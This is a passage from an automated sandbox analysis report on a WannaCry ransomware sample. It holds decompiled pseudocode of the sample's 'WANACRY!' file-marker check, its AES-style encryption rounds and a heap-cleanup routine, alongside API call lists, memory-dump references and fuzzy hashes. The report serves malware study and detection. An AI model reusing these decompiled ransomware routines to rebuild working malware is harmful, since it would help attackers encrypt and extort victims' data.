                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow$memcpy
                                                            • String ID:
                                                            • API String ID: 1881450474-3916222277
                                                            • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                            • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                                                            • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                            • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                                                            • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                                                            • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                                                            • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                                                            • String ID: WANACRY!
                                                            • API String ID: 283026544-1240840912
                                                            • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                            • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                                                            • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                            • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed char _v16;
                                                            				signed int _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				signed int _v44;
                                                            				char _v56;
                                                            				signed int _t150;
                                                            				signed int _t151;
                                                            				signed int _t155;
                                                            				signed int* _t157;
                                                            				signed char _t158;
                                                            				intOrPtr _t219;
                                                            				signed int _t230;
                                                            				signed char* _t236;
                                                            				signed char* _t237;
                                                            				signed char* _t238;
                                                            				signed char* _t239;
                                                            				signed int* _t240;
                                                            				signed char* _t242;
                                                            				signed char* _t243;
                                                            				signed char* _t245;
                                                            				signed int _t260;
                                                            				signed int* _t273;
                                                            				signed int _t274;
                                                            				void* _t275;
                                                            				void* _t276;
                                                            
                                                            				_t275 = __ecx;
                                                            				if( *((char*)(__ecx + 4)) == 0) {
                                                            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                            					_push(0x40d570);
                                                            					_push( &_v56);
                                                            					L0040776E();
                                                            				}
                                                            				_t150 =  *(_t275 + 0x3cc);
                                                            				if(_t150 == 0x10) {
                                                            					return E00402E7E(_t275, _a4, _a8);
                                                            				}
                                                            				asm("cdq");
                                                            				_t230 = 4;
                                                            				_t151 = _t150 / _t230;
                                                            				_t274 = _t151;
                                                            				asm("sbb eax, eax");
                                                            				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                            				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
                                                            				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
                                                            				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
                                                            				_t157 = _t275 + 0x454;
                                                            				if(_t274 > 0) {
                                                            					_v16 = _t274;
                                                            					_v8 = _t275 + 8;
                                                            					_t242 = _a4;
                                                            					do {
                                                            						_t243 =  &(_t242[1]);
                                                            						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                            						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                            						_t245 =  &(_t243[2]);
                                                            						_t273 = _t157;
                                                            						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                            						_v8 = _v8 + 4;
                                                            						_t242 =  &(_t245[1]);
                                                            						_t157 =  &(_t157[1]);
                                                            						 *_t273 =  *_t273 ^  *_v8;
                                                            						_t27 =  &_v16;
                                                            						 *_t27 = _v16 - 1;
                                                            					} while ( *_t27 != 0);
                                                            				}
                                                            				_t158 = 1;
                                                            				_v16 = _t158;
                                                            				if( *(_t275 + 0x410) > _t158) {
                                                            					_v12 = _t275 + 0x28;
                                                            					do {
                                                            						if(_t274 > 0) {
                                                            							_t34 =  &_v28; // 0x403b51
                                                            							_t260 =  *_t34;
                                                            							_v8 = _v12;
                                                            							_a4 = _t260;
                                                            							_v36 = _v24 - _t260;
                                                            							_t240 = _t275 + 0x434;
                                                            							_v40 = _v32 - _t260;
                                                            							_v20 = _t274;
                                                            							do {
                                                            								asm("cdq");
                                                            								_v44 = 0;
                                                            								asm("cdq");
                                                            								asm("cdq");
                                                            								_v8 = _v8 + 4;
                                                            								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
                                                            								_t240 =  &(_t240[1]);
                                                            								_a4 = _a4 + 1;
                                                            								_t84 =  &_v20;
                                                            								 *_t84 = _v20 - 1;
                                                            							} while ( *_t84 != 0);
                                                            						}
                                                            						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                            						_v12 = _v12 + 0x20;
                                                            						_t276 = _t276 + 0xc;
                                                            						_v16 = _v16 + 1;
                                                            						_t158 = _v16;
                                                            					} while (_t158 <  *(_t275 + 0x410));
                                                            				}
                                                            				_v8 = _v8 & 0x00000000;
                                                            				if(_t274 > 0) {
                                                            					_t236 = _a8;
                                                            					_t219 = _v24;
                                                            					_a8 = _t275 + 0x454;
                                                            					_t100 =  &_v28; // 0x403b51
                                                            					_v44 =  *_t100 - _t219;
                                                            					_v40 = _v32 - _t219;
                                                            					do {
                                                            						_a8 =  &(_a8[4]);
                                                            						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                            						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
                                                            						_t237 =  &(_t236[1]);
                                                            						asm("cdq");
                                                            						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
                                                            						asm("cdq");
                                                            						_t238 =  &(_t237[1]);
                                                            						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
                                                            						_t239 =  &(_t238[1]);
                                                            						asm("cdq");
                                                            						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
                                                            						 *_t239 = _t158;
                                                            						_t236 =  &(_t239[1]);
                                                            						_v8 = _v8 + 1;
                                                            						_t219 = _t219 + 1;
                                                            					} while (_v8 < _t274);
                                                            				}
                                                            				return _t158;
                                                            			}


































                                                            0x00403517
                                                            0x0040351e
                                                            0x00403528
                                                            0x00403531
                                                            0x00403536
                                                            0x00403537
                                                            0x00403537
                                                            0x0040353c
                                                            0x00403545
                                                            0x00000000
                                                            0x0040354f
                                                            0x0040355b
                                                            0x0040355c
                                                            0x0040355d
                                                            0x0040355f
                                                            0x0040356e
                                                            0x00403572
                                                            0x0040357d
                                                            0x0040358c
                                                            0x0040358f
                                                            0x00403592
                                                            0x00403598
                                                            0x0040359d
                                                            0x004035a0
                                                            0x004035a3
                                                            0x004035a6
                                                            0x004035ac
                                                            0x004035ad
                                                            0x004035b5
                                                            0x004035be
                                                            0x004035bf
                                                            0x004035c4
                                                            0x004035c9
                                                            0x004035cd
                                                            0x004035d0
                                                            0x004035d3
                                                            0x004035d5
                                                            0x004035d5
                                                            0x004035d5
                                                            0x004035a6
                                                            0x004035dc
                                                            0x004035e3
                                                            0x004035e6
                                                            0x004035ef
                                                            0x004035f2
                                                            0x004035f4
                                                            0x004035fd
                                                            0x004035fd
                                                            0x00403600
                                                            0x00403608
                                                            0x0040360b
                                                            0x00403613
                                                            0x00403619
                                                            0x0040361c
                                                            0x0040361f
                                                            0x00403627
                                                            0x0040363a
                                                            0x0040363d
                                                            0x00403660
                                                            0x00403682
                                                            0x00403688
                                                            0x0040368a
                                                            0x0040368d
                                                            0x00403690
                                                            0x00403690
                                                            0x00403690
                                                            0x0040361f
                                                            0x004036a9
                                                            0x004036ae
                                                            0x004036b2
                                                            0x004036b5
                                                            0x004036b8
                                                            0x004036bb
                                                            0x004035f2
                                                            0x004036c7
                                                            0x004036cd
                                                            0x004036d3
                                                            0x004036d6
                                                            0x004036df
                                                            0x004036e2
                                                            0x004036e7
                                                            0x004036ef
                                                            0x004036f2
                                                            0x00403701
                                                            0x00403709
                                                            0x0040371f
                                                            0x00403726
                                                            0x00403727
                                                            0x00403741
                                                            0x00403745
                                                            0x0040374a
                                                            0x00403760
                                                            0x00403767
                                                            0x00403768
                                                            0x0040377d
                                                            0x00403780
                                                            0x00403782
                                                            0x00403783
                                                            0x00403786
                                                            0x00403787
                                                            0x004036f2
                                                            0x00403794

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                                                            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrowmemcpy
                                                            • String ID: $Q;@
                                                            • API String ID: 2382887404-262343263
                                                            • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                            • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                                                            • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                            • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 54%
                                                            			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed char _v16;
                                                            				signed int _v20;
                                                            				intOrPtr _v24;
                                                            				signed int _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				signed int _v44;
                                                            				char _v56;
                                                            				signed int _t150;
                                                            				signed int _t151;
                                                            				signed int _t155;
                                                            				signed int* _t157;
                                                            				signed char _t158;
                                                            				intOrPtr _t219;
                                                            				signed int _t230;
                                                            				signed char* _t236;
                                                            				signed char* _t237;
                                                            				signed char* _t238;
                                                            				signed char* _t239;
                                                            				signed int* _t240;
                                                            				signed char* _t242;
                                                            				signed char* _t243;
                                                            				signed char* _t245;
                                                            				signed int _t260;
                                                            				signed int* _t273;
                                                            				signed int _t274;
                                                            				void* _t275;
                                                            				void* _t276;
                                                            
                                                            				_t275 = __ecx;
                                                            				if( *((char*)(__ecx + 4)) == 0) {
                                                            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                            					_push(0x40d570);
                                                            					_push( &_v56);
                                                            					L0040776E();
                                                            				}
                                                            				_t150 =  *(_t275 + 0x3cc);
                                                            				if(_t150 == 0x10) {
                                                            					return E004031BC(_t275, _a4, _a8);
                                                            				}
                                                            				asm("cdq");
                                                            				_t230 = 4;
                                                            				_t151 = _t150 / _t230;
                                                            				_t274 = _t151;
                                                            				asm("sbb eax, eax");
                                                            				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                            				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
                                                            				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
                                                            				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
                                                            				_t157 = _t275 + 0x454;
                                                            				if(_t274 > 0) {
                                                            					_v16 = _t274;
                                                            					_v8 = _t275 + 0x1e8;
                                                            					_t242 = _a4;
                                                            					do {
                                                            						_t243 =  &(_t242[1]);
                                                            						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                            						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                            						_t245 =  &(_t243[2]);
                                                            						_t273 = _t157;
                                                            						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                            						_v8 = _v8 + 4;
                                                            						_t242 =  &(_t245[1]);
                                                            						_t157 =  &(_t157[1]);
                                                            						 *_t273 =  *_t273 ^  *_v8;
                                                            						_t27 =  &_v16;
                                                            						 *_t27 = _v16 - 1;
                                                            					} while ( *_t27 != 0);
                                                            				}
                                                            				_t158 = 1;
                                                            				_v16 = _t158;
                                                            				if( *(_t275 + 0x410) > _t158) {
                                                            					_v12 = _t275 + 0x208;
                                                            					do {
                                                            						if(_t274 > 0) {
                                                            							_t260 = _v28;
                                                            							_v8 = _v12;
                                                            							_a4 = _t260;
                                                            							_v36 = _v24 - _t260;
                                                            							_t240 = _t275 + 0x434;
                                                            							_v40 = _v32 - _t260;
                                                            							_v20 = _t274;
                                                            							do {
                                                            								asm("cdq");
                                                            								_v44 = 0;
                                                            								asm("cdq");
                                                            								asm("cdq");
                                                            								_v8 = _v8 + 4;
                                                            								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
                                                            								_t240 =  &(_t240[1]);
                                                            								_a4 = _a4 + 1;
                                                            								_t84 =  &_v20;
                                                            								 *_t84 = _v20 - 1;
                                                            							} while ( *_t84 != 0);
                                                            						}
                                                            						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                            						_v12 = _v12 + 0x20;
                                                            						_t276 = _t276 + 0xc;
                                                            						_v16 = _v16 + 1;
                                                            						_t158 = _v16;
                                                            					} while (_t158 <  *(_t275 + 0x410));
                                                            				}
                                                            				_v8 = _v8 & 0x00000000;
                                                            				if(_t274 > 0) {
                                                            					_t236 = _a8;
                                                            					_t219 = _v24;
                                                            					_a8 = _t275 + 0x454;
                                                            					_v44 = _v28 - _t219;
                                                            					_v40 = _v32 - _t219;
                                                            					do {
                                                            						_a8 =  &(_a8[4]);
                                                            						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                            						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
                                                            						_t237 =  &(_t236[1]);
                                                            						asm("cdq");
                                                            						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
                                                            						asm("cdq");
                                                            						_t238 =  &(_t237[1]);
                                                            						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
                                                            						_t239 =  &(_t238[1]);
                                                            						asm("cdq");
                                                            						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
                                                            						 *_t239 = _t158;
                                                            						_t236 =  &(_t239[1]);
                                                            						_v8 = _v8 + 1;
                                                            						_t219 = _t219 + 1;
                                                            					} while (_v8 < _t274);
                                                            				}
                                                            				return _t158;
                                                            			}


































                                                            0x0040379f
                                                            0x004037a6
                                                            0x004037b0
                                                            0x004037b9
                                                            0x004037be
                                                            0x004037bf
                                                            0x004037bf
                                                            0x004037c4
                                                            0x004037cd
                                                            0x00000000
                                                            0x004037d7
                                                            0x004037e3
                                                            0x004037e4
                                                            0x004037e5
                                                            0x004037e7
                                                            0x004037f6
                                                            0x004037fa
                                                            0x00403805
                                                            0x00403814
                                                            0x00403817
                                                            0x0040381a
                                                            0x00403820
                                                            0x00403828
                                                            0x0040382b
                                                            0x0040382e
                                                            0x00403831
                                                            0x00403837
                                                            0x00403838
                                                            0x00403840
                                                            0x00403849
                                                            0x0040384a
                                                            0x0040384f
                                                            0x00403854
                                                            0x00403858
                                                            0x0040385b
                                                            0x0040385e
                                                            0x00403860
                                                            0x00403860
                                                            0x00403860
                                                            0x00403831
                                                            0x00403867
                                                            0x0040386e
                                                            0x00403871
                                                            0x0040387d
                                                            0x00403880
                                                            0x00403882
                                                            0x0040388b
                                                            0x0040388e
                                                            0x00403896
                                                            0x00403899
                                                            0x004038a1
                                                            0x004038a7
                                                            0x004038aa
                                                            0x004038ad
                                                            0x004038b5
                                                            0x004038c8
                                                            0x004038cb
                                                            0x004038ee
                                                            0x00403910
                                                            0x00403916
                                                            0x00403918
                                                            0x0040391b
                                                            0x0040391e
                                                            0x0040391e
                                                            0x0040391e
                                                            0x004038ad
                                                            0x00403937
                                                            0x0040393c
                                                            0x00403940
                                                            0x00403943
                                                            0x00403946
                                                            0x00403949
                                                            0x00403880
                                                            0x00403955
                                                            0x0040395b
                                                            0x00403961
                                                            0x00403964
                                                            0x0040396d
                                                            0x00403975
                                                            0x0040397d
                                                            0x00403980
                                                            0x0040398f
                                                            0x0040399a
                                                            0x004039b0
                                                            0x004039b7
                                                            0x004039b8
                                                            0x004039d2
                                                            0x004039d6
                                                            0x004039db
                                                            0x004039f1
                                                            0x004039f8
                                                            0x004039f9
                                                            0x00403a0e
                                                            0x00403a11
                                                            0x00403a13
                                                            0x00403a14
                                                            0x00403a17
                                                            0x00403a18
                                                            0x00403980
                                                            0x00403a25

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                                                            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrowmemcpy
                                                            • String ID:
                                                            • API String ID: 2382887404-3916222277
                                                            • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                            • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                                                            • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                            • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004029CC(void* _a4) {
                                                            				void* _t17;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t25;
                                                            				signed int _t35;
                                                            				void* _t37;
                                                            
                                                            				_t37 = _a4;
                                                            				if(_t37 != 0) {
                                                            					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
                                                            						_t25 =  *((intOrPtr*)(_t37 + 4));
                                                            						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
                                                            					}
                                                            					if( *(_t37 + 8) == 0) {
                                                            						L9:
                                                            						_t18 =  *((intOrPtr*)(_t37 + 4));
                                                            						if(_t18 != 0) {
                                                            							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
                                                            						}
                                                            						return HeapFree(GetProcessHeap(), 0, _t37);
                                                            					} else {
                                                            						_t35 = 0;
                                                            						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
                                                            							L8:
                                                            							free( *(_t37 + 8));
                                                            							goto L9;
                                                            						} else {
                                                            							goto L5;
                                                            						}
                                                            						do {
                                                            							L5:
                                                            							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
                                                            							if(_t23 != 0) {
                                                            								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
                                                            							}
                                                            							_t35 = _t35 + 1;
                                                            						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
                                                            						goto L8;
                                                            					}
                                                            				}
                                                            				return _t17;
                                                            			}









                                                            0x004029ce
                                                            0x004029d6
                                                            0x004029db
                                                            0x004029df
                                                            0x004029ea
                                                            0x004029ea
                                                            0x004029ef
                                                            0x00402a1d
                                                            0x00402a1d
                                                            0x00402a22
                                                            0x00402a2e
                                                            0x00402a31
                                                            0x00000000
                                                            0x004029f1
                                                            0x004029f2
                                                            0x004029f7
                                                            0x00402a12
                                                            0x00402a15
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004029f9
                                                            0x004029f9
                                                            0x004029fc
                                                            0x00402a01
                                                            0x00402a07
                                                            0x00402a0b
                                                            0x00402a0c
                                                            0x00402a0d
                                                            0x00000000
                                                            0x004029f9
                                                            0x004029ef
                                                            0x00402a45

                                                            APIs
                                                            • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$FreeProcessfree
                                                            • String ID:
                                                            • API String ID: 3428986607-0
                                                            • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                            • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                                                            • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                                                            • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
                                                            				signed int _v8;
                                                            				void* _v9;
                                                            				void* _v10;
                                                            				void* _v11;
                                                            				signed int _v12;
                                                            				void* _v13;
                                                            				void* _v14;
                                                            				void* _v15;
                                                            				signed int _v16;
                                                            				void* _v17;
                                                            				void* _v18;
                                                            				void* _v19;
                                                            				signed int _v20;
                                                            				void* _v21;
                                                            				void* _v22;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				intOrPtr _v32;
                                                            				char _v44;
                                                            				signed char* _t151;
                                                            				signed char* _t154;
                                                            				signed char* _t155;
                                                            				signed char* _t158;
                                                            				signed char* _t159;
                                                            				signed char* _t160;
                                                            				signed char* _t162;
                                                            				signed int _t166;
                                                            				signed int _t167;
                                                            				signed char* _t172;
                                                            				signed int* _t245;
                                                            				signed int _t262;
                                                            				signed int _t263;
                                                            				signed int _t278;
                                                            				signed int _t279;
                                                            				signed int _t289;
                                                            				signed int _t303;
                                                            				intOrPtr _t344;
                                                            				void* _t345;
                                                            				signed int _t346;
                                                            
                                                            				_t344 = __ecx;
                                                            				_v32 = __ecx;
                                                            				if( *((char*)(__ecx + 4)) == 0) {
                                                            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                            					_push(0x40d570);
                                                            					_push( &_v44);
                                                            					L0040776E();
                                                            				}
                                                            				_t151 = _a4;
                                                            				_t154 =  &(_t151[3]);
                                                            				_t155 =  &(_t154[1]);
                                                            				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
                                                            				_v20 = _t278;
                                                            				_t158 =  &(_t155[3]);
                                                            				_t159 =  &(_t158[1]);
                                                            				_t160 =  &(_t159[1]);
                                                            				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
                                                            				_t162 =  &(_t160[2]);
                                                            				_t163 =  &(_t162[1]);
                                                            				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
                                                            				_v24 = _t262;
                                                            				_t166 =  *(_t344 + 0x410);
                                                            				_v28 = _t166;
                                                            				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
                                                            				if(_t166 > 1) {
                                                            					_a4 = _t344 + 0x30;
                                                            					_v8 = _t166 - 1;
                                                            					do {
                                                            						_t245 =  &(_a4[8]);
                                                            						_a4 = _t245;
                                                            						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
                                                            						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
                                                            						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
                                                            						_t262 = _v24;
                                                            						_v24 = _t262;
                                                            						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
                                                            						_t80 =  &_v8;
                                                            						 *_t80 = _v8 - 1;
                                                            						_v20 = _t278;
                                                            					} while ( *_t80 != 0);
                                                            					_t166 = _v28;
                                                            					_t344 = _v32;
                                                            				}
                                                            				_t167 = _t166 << 5;
                                                            				_t86 = _t344 + 8; // 0x8bf9f759
                                                            				_t279 =  *(_t167 + _t86);
                                                            				_t88 = _t344 + 8; // 0x40355c
                                                            				_t345 = _t167 + _t88;
                                                            				_v8 = _t279;
                                                            				_t172 = _a8;
                                                            				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
                                                            				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
                                                            				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
                                                            				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
                                                            				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
                                                            				_t104 = _t345 + 4; // 0x33c12bf8
                                                            				_t289 =  *_t104;
                                                            				_v8 = _t289;
                                                            				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
                                                            				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
                                                            				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
                                                            				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
                                                            				_t121 = _t345 + 8; // 0x6ff83c9
                                                            				_t303 =  *_t121;
